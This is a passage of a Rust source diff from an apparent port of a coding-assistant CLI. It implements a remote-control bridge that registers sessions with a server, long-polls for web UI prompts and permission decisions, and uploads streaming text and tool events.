{ + pub input_tokens: u32, + pub output_tokens: u32, + pub cost_usd: Option, +} + +/// Session connection state broadcast to the web UI. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum BridgeSessionState { + Connecting, + Connected, + Idle, + Processing, + Disconnected, + Error, +} + +/// Events flowing from the CLI up to the web UI. +#[derive(Debug, Clone, Serialize, Deserialize)] +#[serde(tag = "type", rename_all = "snake_case")] +pub enum BridgeEvent { + /// Streaming text delta for the current assistant turn. + TextDelta { + text: String, + message_id: String, + index: Option, + }, + /// A tool call has started executing. + ToolStart { + tool_name: String, + tool_id: String, + input_preview: Option, + }, + /// A tool call has finished. + ToolEnd { + tool_name: String, + tool_id: String, + result: String, + is_error: bool, + }, + /// The CLI needs the web UI to approve a tool use. + PermissionRequest { + request_id: String, + tool_use_id: String, + tool_name: String, + description: String, + options: Vec, + }, + /// The current turn has completed. + TurnComplete { + message_id: String, + stop_reason: String, + usage: Option, + }, + /// A non-fatal diagnostic or user-visible error message. + Error { + message: String, + code: Option, + }, + /// Response to a `Ping` message. + Pong { server_time: Option }, + /// Session lifecycle state change. + SessionState { + session_id: String, + state: BridgeSessionState, + }, +} + +// --------------------------------------------------------------------------- +// Bridge session state (internal) +// --------------------------------------------------------------------------- + +/// Internal connection state of a [`BridgeSession`]. +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum BridgeState { + Disconnected, + Connecting, + Connected, + Running, + Error(String), +} + +// --------------------------------------------------------------------------- +// Bridge session +// --------------------------------------------------------------------------- + +/// Active bridge session: owns the HTTP client, session credentials, and +/// state. Runs the poll loop in a background tokio task. +pub struct BridgeSession { + config: BridgeConfig, + session_id: String, + state: Arc>, + http: reqwest::Client, + reconnect_count: u32, + #[allow(dead_code)] + last_ping: Option, +} + +impl BridgeSession { + /// Create a new bridge session; generates a fresh UUID for `session_id`. + pub fn new(config: BridgeConfig) -> Self { + let session_id = uuid::Uuid::new_v4().to_string(); + let http = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(30)) + .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) + .build() + .expect("Failed to build reqwest client"); + + Self { + config, + session_id, + state: Arc::new(RwLock::new(BridgeState::Connecting)), + http, + reconnect_count: 0, + last_ping: None, + } + } + + pub fn session_id(&self) -> &str { + &self.session_id + } + + pub fn current_state(&self) -> BridgeState { + self.state.read().clone() + } + + fn set_state(&self, s: BridgeState) { + *self.state.write() = s; + } + + // ----------------------------------------------------------------------- + // Session registration / deregistration + // ----------------------------------------------------------------------- + + /// Register this bridge session with the CCR server. + /// + /// POST `/api/claude_code/sessions` — mirrors the TypeScript + /// `registerBridgeEnvironment` call in `bridgeApi.ts`. + pub async fn register(&mut self) -> anyhow::Result<()> { + let token = self + .config + .session_token + .as_deref() + .ok_or_else(|| anyhow::anyhow!("Bridge register: no session token"))?; + + let url = format!("{}/api/claude_code/sessions", self.config.server_url); + + let body = serde_json::json!({ + "session_id": self.session_id, + "device_id": self.config.device_id, + "client_version": self.config.runner_version, + }); + + debug!(session_id = %self.session_id, url = %url, "Registering bridge session"); + + let resp = self + .http + .post(&url) + .bearer_auth(token) + .header("anthropic-version", "2023-06-01") + .header("x-environment-runner-version", &self.config.runner_version) + .json(&body) + .send() + .await + .context("Bridge register: HTTP send failed")?; + + let status = resp.status().as_u16(); + match status { + 200 | 201 => { + self.set_state(BridgeState::Connected); + info!(session_id = %self.session_id, "Bridge session registered"); + Ok(()) + } + 401 | 403 => { + self.set_state(BridgeState::Error(format!("Auth error: {status}"))); + anyhow::bail!("Bridge register: auth error ({})", status) + } + _ => { + anyhow::bail!("Bridge register: server returned {}", status) + } + } + } + + /// Deregister the session on clean shutdown. + /// + /// DELETE `/api/claude_code/sessions/{id}` — best-effort; errors are + /// logged and swallowed so they don't block process exit. + pub async fn deregister(&self) { + let Some(token) = self.config.session_token.as_deref() else { + return; + }; + + let url = format!( + "{}/api/claude_code/sessions/{}", + self.config.server_url, self.session_id + ); + + debug!(session_id = %self.session_id, "Deregistering bridge session"); + + match self.http.delete(&url).bearer_auth(token).send().await { + Ok(r) if r.status().is_success() => { + info!(session_id = %self.session_id, "Bridge session deregistered"); + } + Ok(r) => { + warn!( + session_id = %self.session_id, + status = %r.status(), + "Bridge deregister returned non-success (ignored)" + ); + } + Err(e) => { + warn!( + session_id = %self.session_id, + error = %e, + "Bridge deregister HTTP error (ignored)" + ); + } + } + } + + // ----------------------------------------------------------------------- + // Polling + // ----------------------------------------------------------------------- + + /// Long-poll for incoming messages from the web UI. + /// + /// GET `/api/claude_code/sessions/{id}/poll` + /// + /// - `200` → JSON array of [`BridgeMessage`]; may be empty. + /// - `204` → No messages; returns empty vec. + /// - `401`/`403` → Auth failure; sets state to `Disconnected` and errors. + async fn poll_messages(&self) -> anyhow::Result> { + let token = self + .config + .session_token + .as_deref() + .ok_or_else(|| anyhow::anyhow!("Poll: no token"))?; + + let url = format!( + "{}/api/claude_code/sessions/{}/poll", + self.config.server_url, self.session_id + ); + + let resp = self + .http + .get(&url) + .bearer_auth(token) + .timeout(std::time::Duration::from_secs(35)) + .send() + .await + .context("Bridge poll: HTTP send failed")?; + + let status = resp.status().as_u16(); + match status { + 200 => { + let text = resp.text().await.context("Bridge poll: reading body")?; + if text.trim().is_empty() || text.trim() == "[]" { + return Ok(vec![]); + } + let msgs: Vec = + serde_json::from_str(&text).context("Bridge poll: JSON parse")?; + Ok(msgs) + } + 204 => Ok(vec![]), + 401 | 403 => { + self.set_state(BridgeState::Error(format!("Auth error: {status}"))); + anyhow::bail!("Bridge poll: auth error ({})", status) + } + _ => { + anyhow::bail!("Bridge poll: server returned {}", status) + } + } + } + + // ----------------------------------------------------------------------- + // Event upload + // ----------------------------------------------------------------------- + + /// Batch-upload outgoing events to the web UI. + /// + /// POST `/api/claude_code/sessions/{id}/events` + async fn upload_events(&self, events: Vec) -> anyhow::Result<()> { + if events.is_empty() { + return Ok(()); + } + + let token = self + .config + .session_token + .as_deref() + .ok_or_else(|| anyhow::anyhow!("Upload: no token"))?; + + let url = format!( + "{}/api/claude_code/sessions/{}/events", + self.config.server_url, self.session_id + ); + + let body = serde_json::json!({ "events": events }); + + let resp = self + .http + .post(&url) + .bearer_auth(token) + .json(&body) + .send() + .await + .context("Bridge upload: HTTP send failed")?; + + if !resp.status().is_success() { + let status = resp.status().as_u16(); + warn!( + session_id = %self.session_id, + status, + count = events.len(), + "Bridge event upload failed" + ); + anyhow::bail!("Bridge upload: server returned {}", status); + } + + debug!( + session_id = %self.session_id, + count = events.len(), + "Bridge events uploaded" + ); + Ok(()) + } + + // ----------------------------------------------------------------------- + // Main poll loop + // ----------------------------------------------------------------------- + + /// Run the bridge poll loop until `cancel` is triggered or a fatal error + /// occurs. + /// + /// On each iteration: + /// 1. Drain any pending outgoing events and upload them in a batch. + /// 2. Long-poll for incoming messages and forward them to `msg_tx`. + /// 3. Back off exponentially on consecutive errors; give up after + /// `config.max_reconnect_attempts`. + /// 4. Sleep `polling_interval_ms` between successful cycles. + pub async fn run_poll_loop( + mut self, + msg_tx: mpsc::Sender, + mut event_rx: mpsc::Receiver, + cancel: CancellationToken, + ) { + info!(session_id = %self.session_id, "Bridge poll loop started"); + + let base_interval = + std::time::Duration::from_millis(self.config.polling_interval_ms.max(500)); + let max_backoff = std::time::Duration::from_secs(60); + + loop { + // Respect cancellation at the top of every iteration. + if cancel.is_cancelled() { + info!(session_id = %self.session_id, "Bridge poll loop cancelled"); + break; + } + + // --- Drain and upload pending events --- + let mut events: Vec = Vec::new(); + while let Ok(ev) = event_rx.try_recv() { + events.push(ev); + } + if !events.is_empty() { + if let Err(e) = self.upload_events(events).await { + warn!(session_id = %self.session_id, error = %e, "Event upload error"); + } + } + + // --- Poll for incoming messages --- + match self.poll_messages().await { + Ok(messages) => { + // Successful poll — reset reconnect counter. + self.reconnect_count = 0; + + for msg in messages { + if msg_tx.send(msg).await.is_err() { + debug!( + session_id = %self.session_id, + "Incoming message channel closed; stopping poll loop" + ); + return; + } + } + } + Err(e) => { + warn!( + session_id = %self.session_id, + error = %e, + reconnect_count = self.reconnect_count, + "Bridge poll error" + ); + + self.reconnect_count += 1; + + if self.config.max_reconnect_attempts > 0 + && self.reconnect_count >= self.config.max_reconnect_attempts + { + error!( + session_id = %self.session_id, + "Max bridge reconnect attempts ({}) reached; stopping", + self.config.max_reconnect_attempts + ); + self.set_state(BridgeState::Error("max reconnects exceeded".into())); + break; + } + + // Exponential backoff capped at `max_backoff`. + let backoff = (base_interval + * 2u32.pow(self.reconnect_count.saturating_sub(1).min(5))) + .min(max_backoff); + + tokio::select! { + _ = tokio::time::sleep(backoff) => {} + _ = cancel.cancelled() => { + info!( + session_id = %self.session_id, + "Bridge cancelled during backoff sleep" + ); + break; + } + } + continue; + } + } + + // --- Wait for the next poll cycle --- + tokio::select! { + _ = tokio::time::sleep(base_interval) => {} + _ = cancel.cancelled() => { + info!( + session_id = %self.session_id, + "Bridge cancelled during idle sleep" + ); + break; + } + } + } + + // Best-effort deregister on shutdown. + self.deregister().await; + info!(session_id = %self.session_id, "Bridge poll loop terminated"); + } +} + +// --------------------------------------------------------------------------- +// Bridge manager +// --------------------------------------------------------------------------- + +/// High-level manager wrapping configuration and a shared HTTP client. +/// +/// Prefer [`start_bridge`] for the simple one-shot API. +pub struct BridgeManager { + config: BridgeConfig, + http: reqwest::Client, +} + +impl BridgeManager { + pub fn new(config: BridgeConfig) -> anyhow::Result { + let http = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(30)) + .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) + .build() + .context("BridgeManager: failed to build HTTP client")?; + Ok(Self { config, http }) + } + + /// Start the bridge polling loop, returning channel endpoints and the + /// session ID. + /// + /// The background task runs until `cancel` is triggered. + pub async fn start( + &self, + cancel: CancellationToken, + ) -> anyhow::Result<( + mpsc::Receiver, + mpsc::Sender, + String, + )> { + start_bridge_with_client(self.config.clone(), self.http.clone(), cancel).await + } +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +/// Start the bridge subsystem in a background task. +/// +/// Registers a new session with the CCR server, then spawns a tokio task +/// running the poll loop. Returns: +/// - `msg_rx` — incoming messages from the web UI (e.g. user prompts). +/// - `event_tx` — sender for outgoing events (e.g. text deltas, tool calls). +/// - `session_id` — the UUID assigned to this session. +/// +/// The background task runs until `cancel` is triggered or too many +/// consecutive errors occur. On shutdown the session is deregistered. +pub async fn start_bridge( + config: BridgeConfig, + cancel: CancellationToken, +) -> anyhow::Result<( + mpsc::Receiver, + mpsc::Sender, + String, +)> { + let http = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(30)) + .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) + .build() + .context("start_bridge: failed to build HTTP client")?; + + start_bridge_with_client(config, http, cancel).await +} + +async fn start_bridge_with_client( + config: BridgeConfig, + _http: reqwest::Client, + cancel: CancellationToken, +) -> anyhow::Result<( + mpsc::Receiver, + mpsc::Sender, + String, +)> { + if !config.is_active() { + anyhow::bail!( + "start_bridge: bridge is not active (enabled={}, token={})", + config.enabled, + config.session_token.is_some() + ); + } + + let mut session = BridgeSession::new(config); + session + .register() + .await + .context("start_bridge: session registration failed")?; + + let session_id = session.session_id().to_string(); + + // Bounded channels — back-pressure prevents unbounded memory growth on a + // slow consumer. + let (msg_tx, msg_rx) = mpsc::channel::(64); + let (event_tx, event_rx) = mpsc::channel::(256); + + tokio::spawn(async move { + session.run_poll_loop(msg_tx, event_rx, cancel).await; + }); + + info!(session_id = %session_id, "Bridge started"); + Ok((msg_rx, event_tx, session_id)) +} + +// --------------------------------------------------------------------------- +// High-level session API (start_bridge_session / poll / respond) +// --------------------------------------------------------------------------- + +/// Information about a newly registered bridge session, returned by +/// [`start_bridge_session`]. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct BridgeSessionInfo { + /// UUID assigned to this session. + pub session_id: String, + /// Full URL that can be shared with others to open the session in a browser. + pub session_url: String, + /// The auth token used for this session (redacted in Display). + pub token: String, +} + +impl std::fmt::Display for BridgeSessionInfo { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + write!( + f, + "BridgeSessionInfo {{ session_id: {}, session_url: {} }}", + self.session_id, self.session_url + ) + } +} + +/// A message returned by [`poll_bridge_messages`]: an inbound item from the +/// remote peer identified by a string `id`, `role`, and `content`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct SimpleMessage { + /// Server-assigned message identifier. + pub id: String, + /// Sender role (`"user"` or `"assistant"`). + pub role: String, + /// Message text content. + pub content: String, +} + +/// Start a bridge session: generate a session ID, register it with the +/// Anthropic API, and return session info including the shareable URL. +/// +/// # Authentication +/// +/// Reads the bearer token from (in order of precedence): +/// 1. `COVEN_CODE_BRIDGE_TOKEN` environment variable +/// 2. `CLAUDE_BRIDGE_OAUTH_TOKEN` environment variable +/// +/// If no token is found, returns an informative error. +/// +/// # Errors +/// +/// Returns an error if: +/// - No auth token is available +/// - The HTTP POST fails or the server returns a non-2xx status +/// - The server URL is not configured +/// +/// # Example +/// +/// ```rust,no_run +/// # tokio::runtime::Runtime::new().unwrap().block_on(async { +/// match claurst_bridge::start_bridge_session(None).await { +/// Ok(info) => println!("Session URL: {}", info.session_url), +/// Err(e) => eprintln!("Could not start bridge: {e}"), +/// } +/// # }); +/// ``` +pub async fn start_bridge_session( + token_override: Option, +) -> anyhow::Result { + // Resolve auth token. + let token = token_override + .or_else(|| std::env::var("COVEN_CODE_BRIDGE_TOKEN").ok()) + .or_else(|| std::env::var("CLAUDE_BRIDGE_OAUTH_TOKEN").ok()) + .filter(|t| !t.is_empty()) + .ok_or_else(|| { + anyhow::anyhow!( + "Remote Control requires a session token.\n\ + Set COVEN_CODE_BRIDGE_TOKEN= to enable.\n\ + Get a token from https://claude.ai (Settings → Remote Control).\n\ + Note: Remote Control is only available with claude.ai subscriptions." + ) + })?; + + // Resolve server base URL. + let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") + .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) + .unwrap_or_else(|_| "https://claude.ai".to_string()); + + let session_id = uuid::Uuid::new_v4().to_string(); + + let hostname = { + hostname::get() + .map(|h| h.to_string_lossy().into_owned()) + .unwrap_or_else(|_| "unknown".to_string()) + }; + + let http = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(30)) + .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) + .build() + .context("start_bridge_session: failed to build HTTP client")?; + + let register_url = format!("{}/api/bridge/sessions", server_url); + + debug!( + session_id = %session_id, + url = %register_url, + "Registering new bridge session" + ); + + let body = serde_json::json!({ + "session_id": session_id, + "hostname": hostname, + "client_version": env!("CARGO_PKG_VERSION"), + "device_id": device_fingerprint(), + }); + + let resp = http + .post(®ister_url) + .bearer_auth(&token) + .header("anthropic-version", "2023-06-01") + .header("anthropic-beta", "environments-2025-11-01") + .json(&body) + .send() + .await + .context("start_bridge_session: HTTP POST failed")?; + + let status = resp.status().as_u16(); + + match status { + 200 | 201 => { + info!(session_id = %session_id, "Bridge session registered successfully"); + } + 401 | 403 => { + anyhow::bail!( + "Bridge session registration failed: authentication error (HTTP {}).\n\ + Your token may be invalid or expired.\n\ + Get a new token from https://claude.ai (Settings → Remote Control).", + status + ); + } + 404 => { + // The /api/bridge/sessions endpoint may not exist in all deployments. + // Fall through to synthetic session URL (best-effort mode). + warn!( + session_id = %session_id, + "Bridge registration endpoint not found (HTTP 404) — \ + using local session ID without server validation" + ); + } + _ => { + let body_text = resp.text().await.unwrap_or_default(); + anyhow::bail!( + "Bridge session registration failed: server returned HTTP {}. {}", + status, + if body_text.is_empty() { + String::new() + } else { + format!("Response: {}", &body_text[..body_text.len().min(200)]) + } + ); + } + } + + // Build the shareable session URL. + let session_url = format!("{}/code/sessions/{}", server_url, session_id); + + Ok(BridgeSessionInfo { + session_id, + session_url, + token, + }) +} + +/// Poll for incoming messages on an active bridge session. +/// +/// GETs `/api/bridge/sessions//messages?since=` and returns +/// the batch of new messages. Uses a 30-second HTTP timeout. On HTTP 429 +/// (rate-limited) the function sleeps with exponential back-off before +/// retrying (up to 3 attempts). +/// +/// Returns an empty `Vec` when there are no new messages (HTTP 204 or empty +/// body). +pub async fn poll_bridge_messages( + info: &BridgeSessionInfo, + since_id: Option<&str>, +) -> anyhow::Result> { + let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") + .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) + .unwrap_or_else(|_| "https://claude.ai".to_string()); + + // Validate session_id before interpolating into URL. + BridgeConfig::validate_id(&info.session_id, "session_id")?; + + let base_url = format!( + "{}/api/bridge/sessions/{}/messages", + server_url, info.session_id + ); + + let http = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(35)) + .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) + .build() + .context("poll_bridge_messages: failed to build HTTP client")?; + + // Retry loop for 429 back-off. + let max_retries = 3u32; + let mut attempt = 0u32; + loop { + let mut request = http + .get(&base_url) + .bearer_auth(&info.token) + .header("anthropic-version", "2023-06-01"); + + if let Some(since) = since_id { + request = request.query(&[("since", since)]); + } + + let resp = request + .send() + .await + .context("poll_bridge_messages: HTTP GET failed")?; + + let status = resp.status().as_u16(); + match status { + 200 => { + let text = resp + .text() + .await + .context("poll_bridge_messages: reading body")?; + if text.trim().is_empty() || text.trim() == "[]" { + return Ok(vec![]); + } + let msgs: Vec = + serde_json::from_str(&text).context("poll_bridge_messages: JSON parse")?; + return Ok(msgs); + } + 204 => return Ok(vec![]), + 429 => { + attempt += 1; + if attempt > max_retries { + anyhow::bail!( + "poll_bridge_messages: rate-limited (HTTP 429) after {} retries", + max_retries + ); + } + let backoff = std::time::Duration::from_millis(1_000 * 2u64.pow(attempt - 1)); + warn!( + attempt, + "Bridge poll rate-limited; backing off {:?}", backoff + ); + tokio::time::sleep(backoff).await; + continue; + } + 401 | 403 => { + anyhow::bail!("poll_bridge_messages: auth error (HTTP {})", status); + } + _ => { + anyhow::bail!("poll_bridge_messages: server returned HTTP {}", status); + } + } + } +} + +/// Post a response to a specific incoming message on an active bridge session. +/// +/// PUTs `/api/bridge/sessions//messages//response` with +/// a JSON body `{"content": "", "done": true}`. +pub async fn post_bridge_response( + info: &BridgeSessionInfo, + msg_id: &str, + content: &str, + done: bool, +) -> anyhow::Result<()> { + let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") + .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) + .unwrap_or_else(|_| "https://claude.ai".to_string()); + + // Validate IDs before URL interpolation. + BridgeConfig::validate_id(&info.session_id, "session_id")?; + BridgeConfig::validate_id(msg_id, "msg_id")?; + + let url = format!( + "{}/api/bridge/sessions/{}/messages/{}/response", + server_url, info.session_id, msg_id + ); + + let http = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(30)) + .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) + .build() + .context("post_bridge_response: failed to build HTTP client")?; + + let body = serde_json::json!({ + "content": content, + "done": done, + }); + + debug!( + session_id = %info.session_id, + msg_id = %msg_id, + done = done, + "Posting bridge response" + ); + + let resp = http + .put(&url) + .bearer_auth(&info.token) + .header("anthropic-version", "2023-06-01") + .json(&body) + .send() + .await + .context("post_bridge_response: HTTP PUT failed")?; + + let status = resp.status().as_u16(); + if resp.status().is_success() { + debug!(session_id = %info.session_id, msg_id = %msg_id, "Bridge response posted"); + Ok(()) + } else { + anyhow::bail!( + "post_bridge_response: server returned HTTP {} for msg {}", + status, + msg_id + ) + } +} + +/// Post a single streaming tool/text event to the bridge server (non-blocking, +/// best-effort). +/// +/// POSTs `{"event": , "ts": }` to +/// `/api/bridge/sessions//events`. +/// +/// Errors are returned to the caller, who should treat them as transient and +/// ignore them so the query loop is never blocked. +pub async fn post_bridge_event(info: &BridgeSessionInfo, payload: String) -> anyhow::Result<()> { + let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") + .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) + .unwrap_or_else(|_| "https://claude.ai".to_string()); + + // Validate session_id before URL interpolation. + BridgeConfig::validate_id(&info.session_id, "session_id")?; + + let url = format!( + "{}/api/bridge/sessions/{}/events", + server_url, info.session_id + ); + + let http = reqwest::Client::builder() + .timeout(std::time::Duration::from_secs(5)) + .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) + .build() + .context("post_bridge_event: failed to build HTTP client")?; + + let body = serde_json::json!({ + "event": payload, + "ts": chrono::Utc::now().timestamp_millis(), + }); + + debug!( + session_id = %info.session_id, + "Posting bridge event" + ); + + let resp = http + .post(&url) + .bearer_auth(&info.token) + .header("anthropic-version", "2023-06-01") + .json(&body) + .send() + .await + .context("post_bridge_event: HTTP POST failed")?; + + let status = resp.status().as_u16(); + if resp.status().is_success() { + debug!(session_id = %info.session_id, "Bridge event posted"); + Ok(()) + } else { + anyhow::bail!("post_bridge_event: server returned HTTP {}", status) + } +} + +// --------------------------------------------------------------------------- +// TUI-facing bridge event types (bridge → TUI state machine) +// --------------------------------------------------------------------------- + +/// How the remote UI responded to a permission request. +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum PermissionResponseKind { + Allow, + Deny, + AllowSession, +} + +/// Internal events sent from the bridge loop to the TUI / main event loop. +/// +/// These are *not* the same as [`BridgeEvent`] (which flows CLI → web UI). +/// `TuiBridgeEvent` flows from the bridge worker task into the main loop so +/// the TUI can update connection state, inject prompts, etc. +#[derive(Debug, Clone)] +pub enum TuiBridgeEvent { + /// The bridge registered successfully and is now polling. + Connected { + session_url: String, + session_id: String, + }, + /// The connection was lost (cleanly or due to error). + Disconnected { reason: Option }, + /// Attempting to reconnect after a failure. + Reconnecting { attempt: u32 }, + /// The web UI sent a new user prompt. + InboundPrompt { + content: String, + sender_id: Option, + }, + /// The web UI asked to cancel the in-progress operation. + Cancelled, + /// The web UI responded to a pending permission request. + PermissionResponse { + tool_use_id: String, + response: PermissionResponseKind, + }, + /// The web UI requested a session title change. + SessionNameUpdate { title: String }, + /// A non-fatal diagnostic from the bridge worker. + Error(String), + /// Keepalive ping — no TUI action required. + Ping, +} + +// --------------------------------------------------------------------------- +// Outbound event types (query loop → bridge → web UI) +// --------------------------------------------------------------------------- + +/// Events from the query/tool loop forwarded outbound to the web UI via the +/// bridge upload channel. The bridge worker serialises these into +/// [`BridgeEvent`] values and POSTs them to the server. +#[derive(Debug, Clone)] +pub enum BridgeOutbound { + TextDelta { + delta: String, + message_id: String, + }, + ToolStart { + id: String, + name: String, + input_preview: Option, + }, + ToolEnd { + id: String, + output: String, + is_error: bool, + }, + TurnComplete { + message_id: String, + stop_reason: String, + }, + Error { + message: String, + }, + SessionMeta { + title: Option, + session_id: String, + }, +} + +// --------------------------------------------------------------------------- +// run_bridge_loop — high-level bridge task entry point +// --------------------------------------------------------------------------- + +/// Run the bridge subsystem as a background task, translating low-level +/// [`BridgeMessage`] poll results into [`TuiBridgeEvent`] values and +/// forwarding [`BridgeOutbound`] events to the server. +/// +/// # Parameters +/// - `config` — bridge configuration (must be active: `enabled == true` and +/// `session_token` is `Some`). +/// - `tui_tx` — channel used to send state-change events to the TUI / main +/// loop. +/// - `outbound_rx` — channel for receiving outbound events from the query +/// loop to upload to the bridge server. +/// - `cancel` — token that triggers a clean shutdown of the loop. +pub async fn run_bridge_loop( + config: BridgeConfig, + tui_tx: mpsc::Sender, + mut outbound_rx: mpsc::Receiver, + cancel: tokio_util::sync::CancellationToken, +) -> anyhow::Result<()> { + if !config.is_active() { + anyhow::bail!( + "run_bridge_loop: bridge is not active (enabled={}, token={})", + config.enabled, + config.session_token.is_some() + ); + } + + // Build a BridgeSession and register with the server. + let mut session = BridgeSession::new(config.clone()); + + // Attempt initial registration; retry with back-off on transient errors. + let base_backoff = std::time::Duration::from_millis(1_000); + let max_backoff = std::time::Duration::from_secs(30); + let mut reg_attempts = 0u32; + + loop { + match session.register().await { + Ok(()) => break, + Err(e) => { + reg_attempts += 1; + warn!( + attempt = reg_attempts, + error = %e, + "Bridge registration failed" + ); + + // Auth errors are fatal — don't retry. + let msg = e.to_string(); + if msg.contains("auth error") || msg.contains("401") || msg.contains("403") { + let _ = tui_tx + .send(TuiBridgeEvent::Error(format!("Bridge auth failed: {}", e))) + .await; + return Err(e); + } + + if reg_attempts >= config.max_reconnect_attempts.max(1) { + let _ = tui_tx + .send(TuiBridgeEvent::Error(format!( + "Bridge registration failed after {} attempts: {}", + reg_attempts, e + ))) + .await; + return Err(e); + } + + let backoff = (base_backoff * 2u32.pow(reg_attempts.min(5))).min(max_backoff); + let _ = tui_tx + .send(TuiBridgeEvent::Reconnecting { + attempt: reg_attempts, + }) + .await; + + tokio::select! { + _ = tokio::time::sleep(backoff) => {} + _ = cancel.cancelled() => { + return Ok(()); + } + } + } + } + } + + // Build the session URL from server_url + session_id. + let session_url = format!( + "{}/remote?session={}", + config.server_url, + session.session_id() + ); + let session_id = session.session_id().to_string(); + + let _ = tui_tx + .send(TuiBridgeEvent::Connected { + session_url: session_url.clone(), + session_id: session_id.clone(), + }) + .await; + + // Build outgoing BridgeEvent channel for the poll loop. + let (bridge_ev_tx, bridge_ev_rx) = mpsc::channel::(256); + + // Build incoming message channel. + let (msg_tx, mut msg_rx) = mpsc::channel::(64); + + // Spawn the low-level poll loop in its own task. + let poll_cancel = cancel.clone(); + tokio::spawn(async move { + session + .run_poll_loop(msg_tx, bridge_ev_rx, poll_cancel) + .await; + }); + + // Message ID counter for outbound text deltas. + let mut msg_counter = 0u64; + + let poll_interval = std::time::Duration::from_millis(config.polling_interval_ms.max(50)); + + loop { + tokio::select! { + // Handle cancellation. + _ = cancel.cancelled() => { + let _ = tui_tx.send(TuiBridgeEvent::Disconnected { reason: None }).await; + break; + } + + // Convert inbound BridgeMessage → TuiBridgeEvent. + msg = msg_rx.recv() => { + match msg { + None => { + // Poll loop shut down. + let _ = tui_tx + .send(TuiBridgeEvent::Disconnected { + reason: Some("Bridge poll loop terminated".to_string()), + }) + .await; + break; + } + Some(BridgeMessage::UserMessage { content, .. }) => { + let _ = tui_tx + .send(TuiBridgeEvent::InboundPrompt { + content, + sender_id: None, + }) + .await; + } + Some(BridgeMessage::PermissionResponse { tool_use_id, decision, .. }) => { + let kind = match decision { + PermissionDecision::Allow | PermissionDecision::AllowPermanently => { + PermissionResponseKind::Allow + } + PermissionDecision::Deny | PermissionDecision::DenyPermanently => { + PermissionResponseKind::Deny + } + }; + let tuid = tool_use_id.unwrap_or_default(); + if !tuid.is_empty() { + let _ = tui_tx + .send(TuiBridgeEvent::PermissionResponse { + tool_use_id: tuid, + response: kind, + }) + .await; + } + } + Some(BridgeMessage::Cancel { .. }) => { + let _ = tui_tx.send(TuiBridgeEvent::Cancelled).await; + } + Some(BridgeMessage::Ping) => { + let _ = tui_tx.send(TuiBridgeEvent::Ping).await; + // Also respond with a Pong to the server. + let _ = bridge_ev_tx + .send(BridgeEvent::Pong { + server_time: Some(chrono::Utc::now().timestamp() as u64), + }) + .await; + } + } + } + + // Forward outbound events from query loop → bridge server. + outbound = outbound_rx.recv() => { + match outbound { + None => { + // Sender dropped; nothing to forward. + } + Some(BridgeOutbound::TextDelta { delta, message_id }) => { + msg_counter += 1; + let _ = bridge_ev_tx + .send(BridgeEvent::TextDelta { + text: delta, + message_id, + index: Some(msg_counter as usize), + }) + .await; + } + Some(BridgeOutbound::ToolStart { id, name, input_preview }) => { + let _ = bridge_ev_tx + .send(BridgeEvent::ToolStart { + tool_name: name, + tool_id: id, + input_preview, + }) + .await; + } + Some(BridgeOutbound::ToolEnd { id, output, is_error }) => { + let _ = bridge_ev_tx + .send(BridgeEvent::ToolEnd { + tool_name: String::new(), + tool_id: id, + result: output, + is_error, + }) + .await; + } + Some(BridgeOutbound::TurnComplete { message_id, stop_reason }) => { + let _ = bridge_ev_tx + .send(BridgeEvent::TurnComplete { + message_id, + stop_reason, + usage: None, + }) + .await; + } + Some(BridgeOutbound::Error { message }) => { + let _ = bridge_ev_tx + .send(BridgeEvent::Error { + message, + code: None, + }) + .await; + } + Some(BridgeOutbound::SessionMeta { title, session_id: sid }) => { + let _ = bridge_ev_tx + .send(BridgeEvent::SessionState { + session_id: sid, + state: BridgeSessionState::Connected, + }) + .await; + if let Some(t) = title { + let _ = tui_tx + .send(TuiBridgeEvent::SessionNameUpdate { title: t }) + .await; + } + } + } + } + + // Yield briefly to avoid busy-polling. + _ = tokio::time::sleep(poll_interval) => {} + } + } + + Ok(()) +} + +// --------------------------------------------------------------------------- +// Trusted device module (re-exported for external callers) +// --------------------------------------------------------------------------- + +pub mod trusted_device { + /// Re-export the crate-level device fingerprint function. + pub use super::device_fingerprint; +} + +// --------------------------------------------------------------------------- +// JWT module (re-exported for external callers) +// --------------------------------------------------------------------------- + +pub mod jwt { + pub use super::{decode_jwt_expiry, jwt_is_expired, JwtClaims}; +} + +// --------------------------------------------------------------------------- +// Re-exports +// --------------------------------------------------------------------------- + +// Allow downstream crates to use reqwest types without a direct dep. +pub use reqwest; + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_device_fingerprint_is_non_empty() { + let fp = device_fingerprint(); + assert!(!fp.is_empty(), "fingerprint should not be empty"); + // SHA-256 hex is always 64 chars + assert_eq!(fp.len(), 64, "SHA-256 hex digest should be 64 chars"); + } + + #[test] + fn 